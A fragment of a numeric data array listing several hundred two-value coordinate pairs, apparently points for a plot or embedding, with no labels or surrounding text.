[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[10.765350147835402, 4.26355033264317],
[7.817292084856258, 3.0485450300896595],
[3.1990871251820026, 3.6130256259877207],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[12.511000378851987, 3.547264743632041],
[2.6157741915651846, 3.1088022135528464],
[3.6755430287090185, 2.4658558409523934],
[7.060678719911859, 3.618460185670135],
[17.831733344604118, 5.601097356442306],
[8.79909367536444, 4.432608366014386],
[20.262525828886847, 4.38253198977739],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[9.782841374634526, 6.436511752429161],
[8.816728351491637, 5.517350427765949],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[11.599493458855028, 4.6319068463010415],
[7.366786430174513, 6.428369989001501],
[4.13832415287115, 3.791493370103742],
[11.84389834840664, 7.2194803662491545],
[4.6484348578469525, 4.498128244166764],
[6.453340793815525, 7.208049672169001],
[7.785473193141325, 4.667062798186051],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[10.352903816466064, 5.4329619694952],
[13.68779991816646, 7.969365452444415],
[20.262525828886847, 4.38253198977739],
[20.290752230806902, 5.971876134651779],
[10.218332769042606, 4.755288786393186],
[9.70851317614466, 6.764568760710533],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[10.765350147835402, 4.26355033264317],
[9.228222681876002, 4.707914178930707],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.54798198686671, 4.392237959001067],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[9.70851317614466, 6.764568760710533],
[12.390006549779804, 2.8565142569979605],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[9.228222681876002, 4.707914178930707],
[7.757238842667287, 3.6066908442572694],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[7.012638573452989, 7.137474062991739],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[5.539849214850788, 5.949223698391216],
[9.436127302593512, 5.541398982964392],
[11.599493458855028, 4.6319068463010415],
[7.366786430174513, 6.428369989001501],
[2.6640740853075005, 2.3912359557692726],
[10.868473100078905, 6.500681652985371],
[4.6484348578469525, 4.498128244166764],
[3.230417925582914, 3.0172709078239617],
[4.765886863174591, 2.2246421206661733],
[5.435836143120371, 2.8043480606961375],
[7.785473193141325, 4.667062798186051],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[20.262525828886847, 4.38253198977739],
[20.290752230806902, 5.971876134651779],
[12.607577814121331, 6.654053135290553],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[10.352903816466064, 5.4329619694952],
[9.70851317614466, 6.764568760710533],
[14.651849458814455, 6.156396527676787],
[9.228222681876002, 4.707914178930707],
[6.81037827822504, 2.028443179487512],
[11.052943486906425, 4.056670488652025],
[6.318696553751853, 2.6493957765030025],
[8.591695637435324, 4.571358857179722],
[8.475262132319893, 4.397279083129038],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[8.54798198686671, 4.392237959001067],
[7.757238842667287, 3.6066908442572694],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[8.54798198686671, 4.392237959001067],
[7.757238842667287, 3.6066908442572694],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[6.318696553751853, 2.6493957765030025],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[8.475262132319893, 4.397279083129038],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[8.54798198686671, 4.392237959001067],
[10.573586033422723, 5.889495426088143],
[10.08043825549381, 5.373027602070418],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.54798198686671, 4.392237959001067],
[6.81037827822504, 2.028443179487512],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[10.08043825549381, 5.373027602070418],
[7.757238842667287, 3.6066908442572694],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[6.441820784103897, 1.8297149833490693],
[7.817292084856258, 3.0485450300896595],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[7.868234704679868, 6.1038468248930515],
[6.925060823285094, 3.9322925779230595],
[9.70851317614466, 6.764568760710533],
[6.318696553751853, 2.6493957765030025],
[8.451288396654498, 7.1685106583930445],
[7.012638573452989, 7.137474062991739],
[6.453340793815525, 7.208049672169001],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[10.00927361084607, 8.043380871528857],
[5.539849214850788, 5.949223698391216],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[8.475262132319893, 4.397279083129038],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[10.573586033422723, 5.889495426088143],
[10.08043825549381, 5.373027602070418],
[7.757238842667287, 3.6066908442572694],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[8.572460333447433, 5.408326049952073],
[6.453340793815525, 7.208049672169001],
[8.451288396654498, 7.1685106583930445],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[5.539849214850788, 5.949223698391216],
[7.897289837095821, 7.843623717963191],
[8.451288396654498, 7.1685106583930445],
[7.012638573452989, 7.137474062991739],
[8.572460333447433, 5.408326049952073],
[6.639913085795089, 4.007152153837444],
[6.453340793815525, 7.208049672169001],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[8.79909367536444, 4.432608366014386],
[20.262525828886847, 4.38253198977739],
[12.607577814121331, 6.654053135290553],
[20.290752230806902, 5.971876134651779],
[11.646036843330032, 5.28959128564458],
[14.651849458814455, 6.156396527676787],
[9.782841374634526, 6.436511752429161],
[16.27085066460655, 7.219369562609158],
[13.68779991816646, 7.969365452444415],
[11.052943486906425, 4.056670488652025],
[12.607577814121331, 6.654053135290553],
[7.868234704679868, 6.1038468248930515],
[10.352903816466064, 5.4329619694952],
[6.925060823285094, 3.9322925779230595],
[9.70851317614466, 6.764568760710533],
[12.390006549779804, 2.8565142569979605],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.54798198686671, 4.392237959001067],
[8.591695637435324, 4.571358857179722],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[7.757238842667287, 3.6066908442572694],
[7.736549504370702, 3.0401062740968237],
[7.428745884499296, 3.948587570104591],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[7.3422331382197745, 3.275992682227498],
[5.539849214850788, 5.949223698391216],
[9.215078124413676, 3.8034825172915108],
[7.736549504370702, 3.0401062740968237],
[7.012638573452989, 7.137474062991739],
[8.572460333447433, 5.408326049952073],
[6.639913085795089, 4.007152153837444],
[7.428745884499296, 3.948587570104591],
[8.451288396654498, 7.1685106583930445],
[7.464807214368578, 4.690885029474544],
[9.31164605264972, 3.6057299715043056],
[7.3422331382197745, 3.275992682227498],
[5.539849214850788, 5.949223698391216],
[9.215078124413676, 3.8034825172915108],
[7.897289837095821, 7.843623717963191],
[11.599493458855028, 4.6319068463010415],
[6.453340793815525, 7.208049672169001],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[10.00927361084607, 8.043380871528857],
[7.736549504370702, 3.0401062740968237],
[7.012638573452989, 7.137474062991739],
[8.572460333447433, 5.408326049952073],
[6.639913085795089, 4.007152153837444],
[7.428745884499296, 3.948587570104591],
[8.451288396654498, 7.1685106583930445],
[6.48937276124812, 4.800578882043143],
[9.31164605264972, 3.6057299715043056],
[7.3422331382197745, 3.275992682227498],
[5.539849214850788, 5.949223698391216],
[9.215078124413676, 3.8034825172915108],
[7.142804913450352, 2.3719820232546924],
[10.08043825549381, 5.373027602070418],
[7.757238842667287, 3.6066908442572694],
[8.54798198686671, 4.392237959001067],
[10.573586033422723, 5.889495426088143],
[8.475262132319893, 4.397279083129038],
[16.71893425153499, 6.886618893628182],
[16.59452827095705, 7.248826600721748],
[7.757238842667287, 3.6066908442572694],
[8.54798198686671, 4.392237959001067],
[12.78702621798014, 7.022321800762671],
[10.08043825549381, 5.373027602070418],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[20.262525828886847, 4.38253198977739],
[12.607577814121331, 6.654053135290553],
[14.651849458814455, 6.156396527676787],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[7.012638573452989, 7.137474062991739],
[8.572460333447433, 5.408326049952073],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[5.539849214850788, 5.949223698391216],
[7.897289837095821, 7.843623717963191],
[8.451288396654498, 7.1685106583930445],
[7.012638573452989, 7.137474062991739],
[6.453340793815525, 7.208049672169001],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[6.639913085795089, 4.007152153837444],
[8.075345535704072, 1.883180556041472],
[7.428745884499296, 3.948587570104591],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[10.751161489077203, 4.225586173294387],
[7.3422331382197745, 3.275992682227498],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[9.215078124413676, 3.8034825172915108],
[7.736549504370702, 3.0401062740968237],
[8.572460333447433, 5.408326049952073],
[6.639913085795089, 4.007152153837444],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[7.3422331382197745, 3.275992682227498],
[9.215078124413676, 3.8034825172915108],
[17.831733344604118, 5.601097356442306],
[13.68779991816646, 7.969365452444415],
[20.262525828886847, 4.38253198977739],
[20.290752230806902, 5.971876134651779],
[12.607577814121331, 6.654053135290553],
[8.991016655478452, 6.881447984734754],
[7.868234704679868, 6.1038468248930515],
[9.70851317614466, 6.764568760710533],
[14.651849458814455, 6.156396527676787],
[7.736549504370702, 3.0401062740968237],
[8.075345535704072, 1.883180556041472],
[6.639913085795089, 4.007152153837444],
[7.428745884499296, 3.948587570104591],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[9.215078124413676, 3.8034825172915108],
[12.603920074979019, 4.528716381518033],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[6.639913085795089, 4.007152153837444],
[10.751161489077203, 4.225586173294387],
[7.428745884499296, 3.948587570104591],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[7.3422331382197745, 3.275992682227498],
[7.905778234791283, 1.7947612929705807],
[9.215078124413676, 3.8034825172915108],
[8.591695637435324, 4.571358857179722],
[8.475262132319893, 4.397279083129038],
[7.757238842667287, 3.6066908442572694],
[8.54798198686671, 4.392237959001067],
[10.573586033422723, 5.889495426088143],
[12.78702621798014, 7.022321800762671],
[12.603920074979019, 4.528716381518033],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[9.51096699847288, 2.5480332991806334],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[9.31164605264972, 3.6057299715043056],
[7.916578028132151, 3.1857693626187498],
[8.745112797664264, 3.904397543504395],
[9.418160268699934, 4.337590860271318],
[7.905778234791283, 1.7947612929705807],
[10.751161489077203, 4.225586173294387],
[12.603920074979019, 4.528716381518033],
[7.736549504370702, 3.0401062740968237],
[6.639913085795089, 4.007152153837444],
[7.428745884499296, 3.948587570104591],
[9.31164605264972, 3.6057299715043056],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[7.3422331382197745, 3.275992682227498],
[10.751161489077203, 4.225586173294387],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[9.51096699847288, 2.5480332991806334],
[8.075345535704072, 1.883180556041472],
[9.394172311872296, 1.1886529769801988],
[9.31164605264972, 3.6057299715043056],
[9.554736555992315, 1.6223503617210633],
[7.3422331382197745, 3.275992682227498],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[10.751161489077203, 4.225586173294387],
[16.71893425153499, 6.886618893628182],
[16.59452827095705, 7.248826600721748],
[10.08043825549381, 5.373027602070418],
[10.573586033422723, 5.889495426088143],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[8.075345535704072, 1.883180556041472],
[9.51096699847288, 2.5480332991806334],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[9.554736555992315, 1.6223503617210633],
[7.3422331382197745, 3.275992682227498],
[8.83870919041701, 0.8672354821446215],
[7.905778234791283, 1.7947612929705807],
[7.736549504370702, 3.0401062740968237],
[8.256646510635516, 3.5516008947314193],
[9.51096699847288, 2.5480332991806334],
[9.394172311872296, 1.1886529769801988],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[9.31164605264972, 3.6057299715043056],
[7.916578028132151, 3.1857693626187498],
[9.554736555992315, 1.6223503617210633],
[8.745112797664264, 3.904397543504395],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[10.751161489077203, 4.225586173294387],
[16.71893425153499, 6.886618893628182],
[21.33088126083242, 4.112066552358572],
[12.78702621798014, 7.022321800762671],
[22.01908128270974, 3.805279465650763],
[10.573586033422723, 5.889495426088143],
[17.831733344604118, 5.601097356442306],
[17.481680662865287, 8.347867766355318],
[13.68779991816646, 7.969365452444415],
[12.607577814121331, 6.654053135290553],
[20.290752230806902, 5.971876134651779],
[14.651849458814455, 6.156396527676787],
[16.27085066460655, 7.219369562609158],
[15.006366271051672, 4.232282823070333],
[11.599493458855028, 4.6319068463010415],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[9.436127302593512, 5.541398982964392],
[5.435836143120371, 2.8043480606961375],
[7.785473193141325, 4.667062798186051],
[6.981801980351727, 5.790295382573812],
[7.139919695904992, 6.091186677843476],
[7.930783504041922, 6.31551486280533],
[7.469449854326634, 5.159645256391554],
[20.746588130132885, 8.084467297957575],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.433117324180472, 1.9414418755023324],
[7.648743254380252, 3.257370873095939],
[3.1990871251820026, 3.6130256259877207],
[3.8285647411742985, 1.878975582108213],
[7.060678719911859, 3.618460185670135],
[6.384641291520963, 1.736955799614506],
[21.33088126083242, 4.112066552358572],
[12.78702621798014, 7.022321800762671],
[10.573586033422723, 5.889495426088143],
[22.01908128270974, 3.805279465650763],
[16.59452827095705, 7.248826600721748],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[11.254633746150182, 4.454268273233757],
[11.978891311426532, 4.674763680292224],
[9.549239473505697, 3.6282603751507314],
[9.51096699847288, 2.5480332991806334],
[10.407688532648766, 4.61081242725336],
[8.745112797664264, 3.904397543504395],
[7.916578028132151, 3.1857693626187498],
[11.585970371549058, 4.421639673447624],
[8.451288396654498, 7.1685106583930445],
[7.012638573452989, 7.137474062991739],
[7.428745884499296, 3.948587570104591],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[5.539849214850788, 5.949223698391216],
[12.603920074979019, 4.528716381518033],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[9.31164605264972, 3.6057299715043056],
[7.916578028132151, 3.1857693626187498],
[9.418160268699934, 4.337590860271318],
[7.905778234791283, 1.7947612929705807],
[9.215078124413676, 3.8034825172915108],
[12.603920074979019, 4.528716381518033],
[10.823832281689429, 4.526520213980637],
[8.256646510635516, 3.5516008947314193],
[10.984574194928442, 4.504231445805296],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[7.916578028132151, 3.1857693626187498],
[8.745112797664264, 3.904397543504395],
[10.751161489077203, 4.225586173294387],
[7.736549504370702, 3.0401062740968237],
[9.091367959976361, 1.0611075859642212],
[7.3422331382197745, 3.275992682227498],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[11.254633746150182, 4.454268273233757],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[9.51096699847288, 2.5480332991806334],
[7.916578028132151, 3.1857693626187498],
[9.418160268699934, 4.337590860271318],
[10.407688532648766, 4.61081242725336],
[11.585970371549058, 4.421639673447624],
[11.599493458855028, 4.6319068463010415],
[4.13832415287115, 3.791493370103742],
[2.6640740853075005, 2.3912359557692726],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[7.785473193141325, 4.667062798186051],
[12.603920074979019, 4.528716381518033],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[9.51096699847288, 2.5480332991806334],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[8.745112797664264, 3.904397543504395],
[9.418160268699934, 4.337590860271318],
[10.751161489077203, 4.225586173294387],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[11.599493458855028, 4.6319068463010415],
[4.13832415287115, 3.791493370103742],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[4.6484348578469525, 4.498128244166764],
[6.453340793815525, 7.208049672169001],
[7.785473193141325, 4.667062798186051],
[12.603920074979019, 4.528716381518033],
[10.823832281689429, 4.526520213980637],
[8.256646510635516, 3.5516008947314193],
[10.984574194928442, 4.504231445805296],
[11.136964472776878, 4.9173911163438655],
[7.916578028132151, 3.1857693626187498],
[11.341575206707201, 4.471666422261309],
[9.418160268699934, 4.337590860271318],
[10.751161489077203, 4.225586173294387],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[11.254633746150182, 4.454268273233757],
[11.978891311426532, 4.674763680292224],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[11.585970371549058, 4.421639673447624],
[8.745112797664264, 3.904397543504395],
[14.061529712863761, 4.184586609941457],
[11.73904635519336, 4.45219662549153],
[10.823832281689429, 4.526520213980637],
[11.632301136566992, 4.463092598239933],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[9.418160268699934, 4.337590860271318],
[11.341575206707201, 4.471666422261309],
[7.861346418623317, 2.0914747316056297],
[9.51096699847288, 2.5480332991806334],
[9.394172311872296, 1.1886529769801988],
[9.549239473505697, 3.6282603751507314],
[10.214376654253327, 1.3079362050833723],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[10.119140125037134, 1.1663607451259574],
[7.861346418623317, 2.0914747316056297],
[8.075345535704072, 1.883180556041472],
[9.51096699847288, 2.5480332991806334],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[9.554736555992315, 1.6223503617210633],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[11.73904635519336, 4.45219662549153],
[11.341575206707201, 4.471666422261309],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[10.984574194928442, 4.504231445805296],
[10.423913162457975, 4.607263376292237],
[9.418160268699934, 4.337590860271318],
[11.73904635519336, 4.45219662549153],
[10.823832281689429, 4.526520213980637],
[11.632301136566992, 4.463092598239933],
[10.984574194928442, 4.504231445805296],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[10.119140125037134, 1.1663607451259574],
[7.861346418623317, 2.0914747316056297],
[9.51096699847288, 2.5480332991806334],
[9.091367959976361, 1.0611075859642212],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[9.554736555992315, 1.6223503617210633],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[9.51096699847288, 2.5480332991806334],
[11.978891311426532, 4.674763680292224],
[9.09247114452116, 4.0768261627605655],
[10.407688532648766, 4.61081242725336],
[9.554736555992315, 1.6223503617210633],
[8.745112797664264, 3.904397543504395],
[7.916578028132151, 3.1857693626187498],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[9.09247114452116, 4.0768261627605655],
[14.061529712863761, 4.184586609941457],
[10.407688532648766, 4.61081242725336],
[8.745112797664264, 3.904397543504395],
[11.978891311426532, 4.674763680292224],
[11.854118699116208, 4.376073110005652],
[10.119140125037134, 1.1663607451259574],
[8.075345535704072, 1.883180556041472],
[9.394172311872296, 1.1886529769801988],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[9.394172311872296, 1.1886529769801988],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[7.916578028132151, 3.1857693626187498],
[9.554736555992315, 1.6223503617210633],
[8.745112797664264, 3.904397543504395],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[10.823832281689429, 4.526520213980637],
[11.632301136566992, 4.463092598239933],
[9.09247114452116, 4.0768261627605655],
[10.407688532648766, 4.61081242725336],
[8.745112797664264, 3.904397543504395],
[11.585970371549058, 4.421639673447624],
[11.854118699116208, 4.376073110005652],
[8.256646510635516, 3.5516008947314193],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[9.31164605264972, 3.6057299715043056],
[7.916578028132151, 3.1857693626187498],
[9.418160268699934, 4.337590860271318],
[9.215078124413676, 3.8034825172915108],
[10.751161489077203, 4.225586173294387],
[12.603920074979019, 4.528716381518033],
[11.341575206707201, 4.471666422261309],
[8.256646510635516, 3.5516008947314193],
[11.240169537763931, 4.0776607288866025],
[10.984574194928442, 4.504231445805296],
[10.423913162457975, 4.607263376292237],
[7.916578028132151, 3.1857693626187498],
[9.418160268699934, 4.337590860271318],
[10.751161489077203, 4.225586173294387],
[16.71893425153499, 6.886618893628182],
[16.59452827095705, 7.248826600721748],
[22.01908128270974, 3.805279465650763],
[10.163158579142998, 0.990417839918792],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[8.83870919041701, 0.8672354821446215],
[12.612098652960508, 4.081772741325043],
[10.823832281689429, 4.526520213980637],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[10.984574194928442, 4.504231445805296],
[10.635474900732435, 4.557320597258936],
[11.585970371549058, 4.421639673447624],
[11.854118699116208, 4.376073110005652],
[11.341575206707201, 4.471666422261309],
[10.119140125037134, 1.1663607451259574],
[10.163158579142998, 0.990417839918792],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[10.30731318365394, 1.320002756139349],
[9.554736555992315, 1.6223503617210633],
[8.83870919041701, 0.8672354821446215],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[10.407688532648766, 4.61081242725336],
[14.061529712863761, 4.184586609941457],
[11.585970371549058, 4.421639673447624],
[11.73904635519336, 4.45219662549153],
[14.061529712863761, 4.184586609941457],
[13.378843848667675, 4.03689538425491],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[10.635474900732435, 4.557320597258936],
[9.046138685340281, 4.4989558659515545],
[11.585970371549058, 4.421639673447624],
[10.5295359251904, 4.913327175929032],
[11.978891311426532, 4.674763680292224],
[10.407688532648766, 4.61081242725336],
[11.854118699116208, 4.376073110005652],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[10.635474900732435, 4.557320597258936],
[9.046138685340281, 4.4989558659515545],
[11.585970371549058, 4.421639673447624],
[10.5295359251904, 4.913327175929032],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[10.823832281689429, 4.526520213980637],
[11.254633746150182, 4.454268273233757],
[10.984574194928442, 4.504231445805296],
[11.585970371549058, 4.421639673447624],
[11.854118699116208, 4.376073110005652],
[11.341575206707201, 4.471666422261309],
[12.612098652960508, 4.081772741325043],
[10.635474900732435, 4.557320597258936],
[11.978891311426532, 4.674763680292224],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[14.061529712863761, 4.184586609941457],
[9.046138685340281, 4.4989558659515545],
[10.407688532648766, 4.61081242725336],
[10.5295359251904, 4.913327175929032],
[11.585970371549058, 4.421639673447624],
[11.854118699116208, 4.376073110005652],
[16.71893425153499, 6.886618893628182],
[23.468500408907552, 2.344280788284791],
[21.33088126083242, 4.112066552358572],
[16.59452827095705, 7.248826600721748],
[21.676622148114877, 1.4140388591859752],
[7.142804913450352, 2.3719820232546924],
[8.54798198686671, 4.392237959001067],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[9.70851317614466, 6.764568760710533],
[12.390006549779804, 2.8565142569979605],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[9.228222681876002, 4.707914178930707],
[7.868234704679868, 6.1038468248930515],
[7.757238842667287, 3.6066908442572694],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[11.978891311426532, 4.674763680292224],
[13.38441619590509, 4.458076240550244],
[10.407688532648766, 4.61081242725336],
[11.585970371549058, 4.421639673447624],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[7.400504118242411, 3.9849382544120675],
[9.046138685340281, 4.4989558659515545],
[10.5295359251904, 4.913327175929032],
[11.854118699116208, 4.376073110005652],
[10.119140125037134, 1.1663607451259574],
[10.163158579142998, 0.990417839918792],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[10.214376654253327, 1.3079362050833723],
[8.83870919041701, 0.8672354821446215],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[10.635474900732435, 4.557320597258936],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[7.400504118242411, 3.9849382544120675],
[9.046138685340281, 4.4989558659515545],
[10.627155716160557, 4.390483829087929],
[11.854118699116208, 4.376073110005652],
[10.119140125037134, 1.1663607451259574],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[10.635474900732435, 4.557320597258936],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[7.400504118242411, 3.9849382544120675],
[10.5295359251904, 4.913327175929032],
[10.627155716160557, 4.390483829087929],
[11.854118699116208, 4.376073110005652],
[15.272869558340066, 5.179633920566634],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[9.436127302593512, 5.541398982964392],
[12.511000378851987, 3.547264743632041],
[5.435836143120371, 2.8043480606961375],
[22.01908128270974, 3.805279465650763],
[10.635474900732435, 4.557320597258936],
[9.046138685340281, 4.4989558659515545],
[10.627155716160557, 4.390483829087929],
